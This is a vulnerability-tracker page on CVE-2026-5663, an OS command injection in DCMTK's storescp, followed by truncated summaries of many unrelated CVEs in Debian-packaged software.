CVE-2026-5663
published 2026-04-06CVE-2026-5663: A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the function executeOnReception/executeOnEndOfStudy of the file…
PriorityP265critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
1.72%
74.6th percentile
A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the function executeOnReception/executeOnEndOfStudy of the file dcmnet/apps/storescp.cc of the component storescp. Performing a manipulation results in os command injection. Remote exploitation of the attack is possible. The patch is named edbb085e45788dccaf0e64d71534cfca925784b8. Applying a patch is the recommended action to fix this issue.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | dcmtk | — | — |
| offis | dcmtk | <= 3.7.0 | — |
| offis | dcmtk | — | — |
| offis | dcmtk | — | — |
| offis | dcmtk | — | — |
| offis | dcmtk | — | — |
| offis | dcmtk | — | — |
| offis | dcmtk | — | — |
| offis | dcmtk | — | — |
| offis | dcmtk | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for OS command injection attempts via crafted DICOM C-STORE requests targeting the storescp component, specifically the executeOnReception/executeOnEndOfStudy functions in dcmnet/apps/storescp.cc ↗
- →Inspect inbound DICOM C-STORE requests for malicious payloads that could trigger OS command injection via storescp reception/end-of-study hooks ↗
- ·Vulnerability affects OFFIS DCMTK up to version 3.7.0; no fix available as of Apr 06, 2026 for affected Linux Debian and Red Hat platforms ↗
- ·Remote exploitation is possible, meaning storescp instances exposed to untrusted networks are at elevated risk ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.06.9MEDIUMCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv6.9MEDIUM
vendor_debian6.9MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2026-5663: dcmtk - A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the...
vendor_debian·2026·CVSS 6.9
CVE-2026-5663 [MEDIUM] CVE-2026-5663: dcmtk - A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the...
A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the function executeOnReception/executeOnEndOfStudy of the file dcmnet/apps/storescp.cc of the component storescp. Performing a manipulation results in os command injection. Remote exploitation of the attack is possible. The patch is named edbb085e45788dccaf0e64d71534cfca925784b8. Applying a patch is the recommended action to fix this issue.
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
OSV
CVE-2026-5663: A security flaw has been discovered in OFFIS DCMTK up to 3
osv·2026-04-06·CVSS 6.9
CVE-2026-5663 [MEDIUM] CVE-2026-5663: A security flaw has been discovered in OFFIS DCMTK up to 3
A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the function executeOnReception/executeOnEndOfStudy of the file dcmnet/apps/storescp.cc of the component storescp. Performing a manipulation results in os command injection. Remote exploitation of the attack is possible. The patch is named edbb085e45788dccaf0e64d71534cfca925784b8. Applying a patch is the recommended action to fix this issue.
GHSA
GHSA-c42x-qh72-7h87: A security flaw has been discovered in OFFIS DCMTK up to 3
ghsa_unreviewed·2026-04-06
CVE-2026-5663 [MEDIUM] CWE-77 GHSA-c42x-qh72-7h87: A security flaw has been discovered in OFFIS DCMTK up to 3
A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the function executeOnReception/executeOnEndOfStudy of the file dcmnet/apps/storescp.cc of the component storescp. Performing a manipulation results in os command injection. Remote exploitation of the attack is possible. The patch is named edbb085e45788dccaf0e64d71534cfca925784b8. Applying a patch is the recommended action to fix this issue.
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-2369 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-2369 [MEDIUM] CVE-2026-2369 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2369 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libsoup. An integer underflow vulnerability occurs when processing content with a zero-length resource, leading to a buffer overread. This can allow an attacker to potentially access sensitive information or cause an application level denial of service.
Source : NVD
## 6.5
Score
Published March 19, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup3-debuginfo
libsoup3-devel
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Adde
Wiz
CVE-2026-33691 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-33691 [MEDIUM] CVE-2026-33691 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33691 :
Linux Debian vulnerability analysis and mitigation
The OWASP core rule set (CRS) is a set of generic attack detection rules for use with compatible web application firewalls. Prior to versions 3.3.9 and 4.25.0, a bypass was identified in OWASP CRS that allows uploading files with dangerous extensions (.php, .phar, .jsp, .jspx) by inserting whitespace padding in the filename (e.g. photo. php or shell.jsp ). The affected rules do not normalize whitespace before evaluating the file extension regex, so the dot-extension check fails to match. This issue has been patched in versions 3.3.9 and 4.25.0.
Source : NVD
## 6.8
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit
Wiz
CVE-2025-67477 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67477 [MEDIUM] CVE-2025-67477 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67477 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files resources/src/mediawiki.Special.Apisandbox/ApiSandboxLayout.Js.
This issue affects MediaWiki: from * before 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12 No Fix Added at: Dec 12, 2025
Debian
Wiz
CVE-2018-25223 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2018-25223 [CRITICAL] CVE-2018-25223 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2018-25223 :
Echo vulnerability analysis and mitigation
Crashmail 1.6 contains a stack-based buffer overflow vulnerability that allows remote attackers to execute arbitrary code by sending malicious input to the application. Attackers can craft payloads with ROP chains to achieve code execution in the application context, with failed attempts potentially causing denial of service.
Source : NVD
## 9.3
Score
Published March 28, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 49.2
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
crashmail
Sources
NVD
Echo Severity CRITICAL No Fix Added at: Mar
Wiz
CVE-2023-54279 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54279 [MEDIUM] CVE-2023-54279 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54279 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
MIPS: fw: Allow firmware to pass a empty env
fw_getenv will use env entry to determine style of env,
however it is legal for firmware to just pass a empty list.
Check if first entry exist before running strchr to avoid
null pointer dereference.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-5.15
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 31,
Wiz
CVE-2026-23034 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23034 CVE-2026-23034 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23034 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/userq: Fix fence reference leak on queue teardown v2
The user mode queue keeps a pointer to the most recent fence in
userq->last_fence. This pointer holds an extra dma_fence reference.
When the queue is destroyed, we free the fence driver and its xarray,
but we forgot to drop the last_fence reference.
Because of the missing dma_fence_put(), the last fence object can stay
alive when the driver unloads. This leaves an allocated object in the
amdgpu_userq_fence slab cache and triggers
This is visible during driver unload as:
BUG amdgpu_userq_fence: Objects remaining on __kmem_cache_shutdown()
kmem_cache_destroy amdgpu_userq_fence: Slab c
Wiz
CVE-2026-2271 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.3
CVE-2026-2271 [LOW] CVE-2026-2271 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2271 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in GIMP's PSP (Paint Shop Pro) file parser. A remote attacker could exploit an integer overflow vulnerability in the read_creator_block() function by providing a specially crafted PSP image file. This vulnerability occurs when a 32-bit length value from the file is used for memory allocation without proper validation, leading to a heap overflow and an out-of-bounds write. Successful exploitation could result in an application level denial of service.
Source : NVD
## 3.3
Score
Published March 26, 2026
Severity LOW
CNA Score 3.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probab
Wiz
CVE-2025-24857 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2025-24857 [HIGH] CVE-2025-24857 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-24857 :
Linux Debian vulnerability analysis and mitigation
Improper access control for volatile memory containing boot code in Universal Boot Loader (U-Boot) before 2017.11 and Qualcomm chips IPQ4019, IPQ5018, IPQ5322, IPQ6018, IPQ8064, IPQ8074, and IPQ9574 could allow an attacker to execute arbitrary code.
Source : NVD
## 7.6
Score
Published December 10, 2025
Severity HIGH
CNA Score 7.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
u-boot
Sources
NVD
Debian 11, 12, 13, 14 Severity HIGH Has Fix Added at: Dec 22, 2025
Echo Severity HIGH Has Fix Added at:
Wiz
CVE-2025-67899 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.9
CVE-2025-67899 [LOW] CVE-2025-67899 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67899 :
Linux Debian vulnerability analysis and mitigation
uriparser through 0.9.9 allows unbounded recursion and stack consumption, as demonstrated by ParseMustBeSegmentNzNc with large input containing many commas.
Source : NVD
## 2.9
Score
Published December 14, 2025
Severity LOW
CNA Score 2.9
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mingw64-uriparser
uriparser-debuginfo
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 16, 2025
Debian 14 Severity LOW No Fix Added at: Dec 16, 2025
Echo Severity LOW Has Fix Added at: Dec
Wiz
CVE-2025-68817 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-68817 [HIGH] CVE-2025-68817 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68817 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency
Under high concurrency, A tree-connection object (tcon) is freed on
a disconnect path while another path still holds a reference and later
executes *_put()/write on it.
Source : NVD
## 7.8
Score
Published January 13, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-6.1
linux-azure-nvidia
Sources
NVD
Debian 11, 12, 13,
Wiz
CVE-2026-23322 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23322 CVE-2026-23322 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23322 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ipmi: Fix use-after-free and list corruption on sender error
The analysis from Breno:
When the SMI sender returns an error, smi_work() delivers an error
response but then jumps back to restart without cleaning up properly:
intf->curr_msg is not cleared, so no new message is pulled
newmsg still points to the message, causing sender() to be called again with the same message
If sender() fails again, deliver_err_response() is called with the same recv_msg that was already queued for delivery
This causes list_add corruption ("list_add double add") because the
recv_msg is added to the user_msgs list twice. Subsequently, the
corrupted list leads to u
Wiz
CVE-2026-23443 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23443 [MEDIUM] CVE-2026-23443 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23443 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ACPI: processor: Fix previous acpi_processor_errata_piix4() fix
After commi f132e089fe89 ("ACPI: processor: Fix NULL-pointer dereference
in acpi_processor_errata_piix4()"), device pointers may be dereferenced
after dropping references to the device objects pointed to by them,
which may cause a use-after-free to occur.
Moreover, debug messages about enabling the errata may be printed
if the errata flags corresponding to them are unset.
Address all of these issues by moving message printing to the points
in the code where the errata flags are set.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubunt
Wiz
CVE-2026-23425 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23425 [MEDIUM] CVE-2026-23425 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23425 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Fix ID register initialization for non-protected pKVM guests
kvm
kvm
pkvm_init_features_from_host()
KVM_ARCH_FLAG_ID_REGS_INITIALIZED
id_regs
kvm_has_feat()
ctxt_has_tcrx()
kvm
kvm
KVM_ARCH_FLAG_ID_REGS_INITIALIZED
pkvm_init_features_from_host
vm_copy_id_regs
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian
Wiz
CVE-2026-24029 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-24029 [MEDIUM] CVE-2026-24029 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24029 :
Linux Debian vulnerability analysis and mitigation
When the early_acl_drop (earlyACLDrop in Lua) option is disabled (default is enabled) on a DNS over HTTPs frontend using the nghttp2 provider, the ACL check is skipped, allowing all clients to send DoH queries regardless of the configured ACL.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Apr 02, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Ap
Wiz
CVE-2025-6592 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.1
CVE-2025-6592 [LOW] CVE-2025-6592 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6592 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation AbuseFilter. This vulnerability is associated with program files includes/auth/AuthManager.Php.
This issue affects AbuseFilter: from fe0b1cb9e9691faf4d8d9bd80646589f6ec37615 before 1.43.2, 1.44.0.
Source : NVD
## 2.1
Score
Published February 2, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13 Has Fix Added at: Jul 03, 2025
Debian 14 Has Fix Added at: Aug 10, 2025
## Get a CVE risk assessment
Get a pri
Wiz
CVE-2026-23469 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23469 CVE-2026-23469 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23469 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/imagination: Synchronize interrupts before suspending the GPU
The runtime PM suspend callback doesn't know whether the IRQ handler is
in progress on a different CPU core and doesn't wait for it to finish.
Depending on timing, the IRQ handler could be running while the GPU is
suspended, leading to kernel crashes when trying to access GPU
registers. See example signature below.
In a power off sequence initiated by the runtime PM suspend callback,
wait for any IRQ handlers in progress on other CPU cores to finish, by
calling synchronize_irq().
At the same time, remove the runtime PM resume/put calls in the threaded
IRQ handler. On top of not bei
Wiz
CVE-2023-54188 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54188 [MEDIUM] CVE-2023-54188 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54188 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: apple-admac: Fix 'current_tx' not getting freed
In terminate_all we should queue up all submitted descriptors to be
freed. We do that for the content of the 'issued' and 'submitted' lists,
but the 'current_tx' descriptor falls through the cracks as it's
removed from the 'issued' list once it gets assigned to be the current
descriptor. Explicitly queue up freeing of the 'current_tx' descriptor
to address a memory leak that is otherwise present.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due
Wiz
CVE-2026-29056 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2026-29056 [HIGH] CVE-2026-29056 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29056 :
Linux Debian vulnerability analysis and mitigation
UserInviteController::register()
UserModel::create()
role
role=app-admin
Source : NVD
## 7
Score
Published March 18, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.6
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
kanboard
Sources
NVD
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Severity
Score
Technologies
Compo
Wiz
CVE-2025-34457 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-34457 [HIGH] CVE-2025-34457 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-34457 :
Linux Debian vulnerability analysis and mitigation
wb2osz/direwolf (Dire Wolf) versions up to and including 1.8, prior to commit 694c954, contain a stack-based buffer overflow vulnerability in the function kiss_rec_byte() located in src/kiss_frame.c. When processing crafted KISS frames that reach the maximum allowed frame length (MAX_KISS_LEN), the function appends a terminating FEND byte without reserving sufficient space in the stack buffer. This results in an out-of-bounds write followed by an out-of-bounds read during the subsequent call to kiss_unwrap(), leading to stack memory corruption or application crashes. This vulnerability may allow remote unauthenticated attackers to trigger a denial-of-service condition.
Source : NVD
## 8.7
Score
Published Decembe
Wiz
CVE-2026-4887 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4887 [MEDIUM] CVE-2026-4887 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4887 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in GIMP. This issue is a heap buffer over-read in GIMP PCX file loader due to an off-by-one error. A remote attacker could exploit this by convincing a user to open a specially crafted PCX image. Successful exploitation could lead to out-of-bounds memory disclosure and a possible application crash, resulting in a Denial of Service (DoS).
Source : NVD
## 6.1
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
gimp-devel
Wiz
CVE-2023-54139 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54139 [MEDIUM] CVE-2023-54139 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54139 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
tracing/user_events: Ensure write index cannot be negative
The write index indicates which event the data is for and accesses a
per-file array. The index is passed by user processes during write()
calls as the first 4 bytes. Ensure that it cannot be negative by
returning -EINVAL to prevent out of bounds accesses.
Update ftrace self-test to ensure this occurs properly.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPS
Wiz
CVE-2023-53986 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-53986 CVE-2023-53986 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-53986 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mips: bmips: BCM6358: disable RAC flush for TP1
RAC flush causes kernel panics on BCM6358 with EHCI/OHCI when booting from TP1:
[ 3.881739] usb 1-1: new high-speed USB device number 2 using ehci-platform
[ 3.895011] Reserved instruction in kernel code[#1]:
[ 3.900113] CPU: 0 PID: 1 Comm: init Not tainted 5.10.16 #0
[ 3.905829] $ 0 : 00000000 10008700 00000000 77d94060
[ 3.911238] $ 4 : 7fd1f088 00000000 81431cac 81431ca0
[ 3.916641] $ 8 : 00000000 ffffefff 8075cd34 00000000
[ 3.922043] $12 : 806f8d40 f3e812b7 00000000 000d9aaa
[ 3.927446] $16 : 7fd1f068 7fd1f080 7ff559b8 81428470
[ 3.932848] $20 : 00000000 00000000 55590000 77d70000
[ 3.938251] $24
Wiz
CVE-2026-1766 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-1766 [MEDIUM] CVE-2026-1766 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1766 :
Linux Debian vulnerability analysis and mitigation
[Heap Buffer Overflow in GNOME localsearch MP3 Extractor (ID3v2.3 COMM Tags)]
Source : NVD
Published February 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tracker-miner-files
tracker-miners
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Feb 04, 2026
Debian 14 Has Fix Added at: Feb 04, 2026
Echo No Fix Added at: Feb 04, 2026
Red Hat 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 04, 2026
Ubuntu 18.04, 20.04 Severity MEDIUM No Fix Added at: Feb 20, 2026
Wiz
CVE-2025-14308 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2025-14308 [CRITICAL] CVE-2025-14308 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14308 :
Linux Debian vulnerability analysis and mitigation
An integer overflow vulnerability exists in the write method of the Buffer class in Robocode version 1.9.3.6. The method fails to properly validate the length of data being written, allowing attackers to cause an overflow, potentially leading to buffer overflows and arbitrary code execution. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the data length, leading to potential unauthorized code execution.
Source : NVD
## 10
Score
Published December 9, 2025
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS
Wiz
CVE-2022-50707 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50707 [MEDIUM] CVE-2022-50707 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50707 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
virtio-crypto: fix memory leak in virtio_crypto_alg_skcipher_close_session()
'vc_ctrl_req' is alloced in virtio_crypto_alg_skcipher_close_session(),
and should be freed in the invalid ctrl_status->status error handling
case. Otherwise there is a memory leak.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at:
Wiz
CVE-2026-31391 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31391 [MEDIUM] CVE-2026-31391 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31391 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
crypto: atmel-sha204a - Fix OOM ->tfm_count leak
If memory allocation fails, decrement ->tfm_count to avoid blocking
future reads.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Apr 05, 2026
Debian 14 Has Fix Added at: Apr 05, 2026
Echo Has Fix Added at: Apr 05, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MED
Wiz
CVE-2025-11173 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-11173 [MEDIUM] CVE-2025-11173 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-11173 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation OATHAuth. This vulnerability is associated with program files src/Special/OATHManage.Php.
This issue affects OATHAuth: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Oct 03, 2025
Echo Has Fix Added at: Nov 18, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so yo
Wiz
CVE-2026-27475 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-27475 [CRITICAL] CVE-2026-27475 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27475 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.9 allows Insecure Deserialization in the public area through the table_valeur filter and the DATA iterator, which accept serialized data. An attacker who can place malicious serialized content (a pre-condition requiring prior access or another vulnerability) can trigger arbitrary object instantiation and potentially achieve code execution. The use of serialized data in these components has been deprecated and will be removed in SPIP 5. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
## 9.2
Score
Published February 19, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Dat
Wiz
CVE-2022-50854 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2022-50854 CVE-2022-50854 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50854 :
